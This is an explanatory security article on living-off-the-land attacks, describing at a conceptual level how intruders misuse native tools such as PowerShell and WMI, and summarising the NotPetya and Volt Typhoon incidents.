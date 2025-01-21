Threat actors constantly search for new approaches as well as update older techniques to attack enterprise networks in the face of stronger cybersecurity defenses. Case in point: living-off-the-land attacks, a favorite tool of malicious hackers eager to infiltrate IT environments.

Let's examine living-off-the-land attacks, what they are and how to successfully combat them.

What are living-off-the-land attacks? Living-off-the-land (LOTL) attacks aren't new; they have been around since modern computing systems have existed. They are the digital version of homesteading or living off-grid in everyday life. To that end, LOTL attacks use legitimate tools, software and built-in OSes to gain entry. Instead of using more intrusive and direct malware deployments, attackers rely on existing fileless malware and trusted applications to exploit their victims. As a result, these strategic attacks often blend in without detection. LOTL attackers gain network access through the use of exploit kits, stolen credentials and vulnerabilities. These can be gathered from dark web marketplaces where they are sold by other attackers or initial access brokers. Attackers also conduct social engineering and phishing campaigns to trick users into providing data that enables them to gain unauthorized access to the environment. Once inside the network, intruders launch malicious attacks by using native programs, such as Windows Management Instrumentation, CLI tools or PowerShell, to prevent being discovered. To avoid being traced on hard drives, attackers run malicious scripts or commands directly into memory. Additional LOTL techniques include memory-only malware and fileless ransomware deployment that bypass security defenses. The goal of these attacks is to exfiltrate data by tricking trusted tools into executing system commands. Threat actors lurk in the background while they evade detection and security defenses. By escalating privilege and access levels, LOTL attackers can inflict even more damage.

Examples of living-off-the-land attacks LOTL attacks are effective because they enable malicious actors -- unnoticed -- to move laterally and penetrate deeper into a system's infrastructure. Unlike traditional malware or ransomware attacks, these intrusions, because they use native tools, are not immediately discoverable by antivirus and antimalware tools. Two of the most notable LOTL incidents involve NotPetya and Volt Typhoon. NotPetya. The 2017 NotPetya attack that targeted Ukraine caused widespread damage to the country's digital infrastructure. After the malware was deployed, it encrypted critical files and controlled boot records, leaving critical systems inoperable. More than 300 Ukrainian companies were affected, among them healthcare facilities, utility companies, airports and government organizations. The attack also affected global companies such as FedEx and Merck, causing disruptions and widespread outages.

Volt Typhoon. Volt Typhoon is a Chinese nation-state-sponsored hacker group that has consistently used LOTL attacks to target U.S.-based critical infrastructures since 2021. The group typically surveils its target's systems using native commands on trusted systems, such as Active Directory, or network configurations. Its attackers don't rely on specialized malware as seen with some other LOTL attacks. Instead, they employ legitimate network protocols and utilities to exfiltrate sensitive information. This approach reduces the likelihood of detection.